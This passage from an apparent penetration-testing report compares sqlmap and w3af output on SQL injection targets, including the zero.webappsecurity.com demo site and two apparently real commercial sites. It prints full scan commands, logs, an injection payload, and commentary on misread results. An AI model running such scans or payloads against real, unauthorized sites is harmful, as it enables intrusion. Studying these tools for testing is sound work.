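The two oracles are interchangeable inside extract(), which is exactly why sqlmap reports a "Type" per injection point and carries on with the same enumeration logic either way; the only thing that changes is cost, a page comparison versus a forced delay per request. safe_lookup() shows the fix: with a bound parameter the same tautology is just a user name that does not exist.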


B) W3af

w3af>>> target

w3af/config:target>>> set target http://zero.webappsecurity.com

w3af/config:target>>> back

w3af>>> start

Found 3 URLs and 5 different points of injection.
The list of URLs is:
- http://zero.webappsecurity.com
- http://zero.webappsecurity.com/login1.asp
- http://zero.webappsecurity.com/rootlogin.asp
The list of fuzzable requests is:
- http://zero.webappsecurity.com | Method: GET
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp", using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.

Scan finished in 13 seconds.

w3af>>>

Note that the target was not changed for this run: it still points at http://zero.webappsecurity.com, so the scan simply repeats the result of section 1. No w3af result for http://crackme.cenzic.com is recorded in this report.


3. Others:

http://www.arocariaflowers.com/article.php?id=%275

A) SQLmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.arocariaflowers.com/article.php?id=%275" -b

[19:18:56] [INFO] using '/pentest/database/sqlmap/output/www.arocariaflowers.com/session' as session file

[19:18:56] [INFO] testing connection to the target url

[19:18:56] [INFO] heuristics detected web page charset 'ascii'

[19:18:56] [INFO] testing if the url is stable, wait a few seconds

[19:18:58] [INFO] url is stable

[19:18:58] [INFO] testing if GET parameter 'id' is dynamic

[19:18:58] [INFO] confirming that GET parameter 'id' is dynamic

[19:18:59] [INFO] GET parameter 'id' is dynamic

[19:18:59] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

[19:18:59] [INFO] testing sql injection on GET parameter 'id'

[19:18:59] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[19:19:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

parsed error message(s) showed that the back-end DBMS could be MySQL. Do you want to skip test payloads specific for other DBMSes? [Y/n] y

[19:19:07] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[19:19:08] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[19:19:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[19:19:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[19:19:23] [WARNING] GET parameter 'id' is not injectable

[19:19:23] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

[19:19:23] [WARNING] HTTP error codes detected during testing:

404 (Not Found) - 88 times

Although the page was on the list, sqlmap finds no vulnerability in it, and none was found by hand either; it has probably been fixed.

Two things weaken this run, though. The baseline URL already carries the injected quote (id=%275, i.e. id='5): sqlmap expects the parameter's original, valid value (id=5) and adds quotes itself, so with a broken baseline the "true" and "false" responses it compares are both error pages. And the run logged 88 responses with status 404, which suggests the injected requests never reached a working article handler. Before calling the parameter safe, the scan should be repeated with id=5 and, as the tool suggests, higher --level/--risk values.


B) W3af

w3af>>> target

w3af/config:target>>> set target http://www.arocariaflowers.com/article.php

w3af/config:target>>> back

w3af>>> start

Found 4 URLs and 6 different points of injection.
The list of URLs is:
- http://zero.webappsecurity.com
- http://zero.webappsecurity.com/login1.asp
- http://zero.webappsecurity.com/rootlogin.asp
- http://www.arocariaflowers.com/article.php
The list of fuzzable requests is:
- http://www.arocariaflowers.com/article.php | Method: GET
- http://zero.webappsecurity.com | Method: GET
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp", using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.

Scan finished in 12 seconds.

w3af>>>

As can be seen, because the earlier scans were not cleared, w3af keeps their results in its knowledge base and reports them again; in the original the entries for the current target were set in bold. The only lines that belong to this scan are the two for http://www.arocariaflowers.com/article.php, and no injection is reported for them: the SQL injection shown is still the login1.asp finding from the first target.


http://www.bloomhealth.net/news/article.php?id='48

A) SQLmap

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://www.bloomhealth.net/news/article.php?id='48" -b

[19:24:28] [INFO] using '/pentest/database/sqlmap/output/www.bloomhealth.net/session' as session file

[19:24:28] [INFO] testing connection to the target url

[19:24:28] [INFO] testing if the url is stable, wait a few seconds

[19:24:30] [INFO] url is stable

[19:24:30] [INFO] testing if GET parameter 'id' is dynamic

[19:24:30] [WARNING] GET parameter 'id' appears to be not dynamic

[19:24:31] [WARNING] heuristic test shows that GET parameter 'id' might not be injectable

[19:24:31] [INFO] testing sql injection on GET parameter 'id'

[19:24:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'

[19:24:39] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'

[19:24:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'

[19:24:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'

[19:24:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'

[19:24:46] [INFO] testing 'MySQL > 5.0.11 stacked queries'

[19:24:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries'

[19:24:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'

[19:24:57] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'

[19:24:59] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'

[19:25:01] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'

[19:25:02] [INFO] testing 'Oracle AND time-based blind'

[19:25:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'

[19:25:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'

[19:25:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS

[19:25:44] [WARNING] GET parameter 'id' is not injectable

[19:25:44] [CRITICAL] all parameters appear to be not injectable. Try to increase --level/--risk values to perform more tests. Rerun by providing either a valid --string or a valid --regexp, refer to the user's manual for details

Another one that is not injectable. The same caveat as before applies: the baseline value is id='48 rather than id=48, and sqlmap reports that the parameter "appears to be not dynamic", which is what a baseline that already breaks the query looks like. Here no DBMS could be fingerprinted from error messages either (sqlmap fell back to "unescaped" generic tests), so the run says little beyond "no error-based or blind injection with the default --level/--risk against a broken baseline".


B) W3af

w3af>>> target

w3af/config:target>>> set target http://www.bloomhealth.net/news/article.php

w3af/config:target>>> back

w3af>>> start

Found 5 URLs and 7 different points of injection.
The list of URLs is:
- http://www.bloomhealth.net/news/article.php
- http://zero.webappsecurity.com
- http://zero.webappsecurity.com/login1.asp
- http://zero.webappsecurity.com/rootlogin.asp
- http://www.arocariaflowers.com/article.php
The list of fuzzable requests is:
- http://www.arocariaflowers.com/article.php | Method: GET
- http://www.bloomhealth.net/news/article.php | Method: GET
- http://zero.webappsecurity.com | Method: GET
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="minimum", graphicOption="standard")
- http://zero.webappsecurity.com/login1.asp | Method: POST | Parameters: (login="", password="", graphicOption="standard")
- http://zero.webappsecurity.com/rootlogin.asp | Method: POST | Parameters: (txtPassPhrase="", txtHidden="This was h...", txtName="")

SQL injection in a Microsoft SQL database was found at: "http://zero.webappsecurity.com/login1.asp", using HTTP method POST. The sent post-data was: "login=d'z"0&password=FrAmE30.&graphicOption=minimum&graphicOption=standard". The modified parameter was "login". This vulnerability was found in the request with id 23.

Scan finished in 11 seconds.

w3af>>>


For the last two targets sqlmap reports no injectable parameter. At first sight w3af disagrees, but the injection it prints is still the login1.asp finding on zero.webappsecurity.com, carried over in its knowledge base from the first scan; for http://www.arocariaflowers.com/article.php and http://www.bloomhealth.net/news/article.php it reports nothing, so the two tools actually agree. Reading a tool's output this carefully is where the human tester comes in: we also tried 6 by hand on these pages and found no vulnerability either.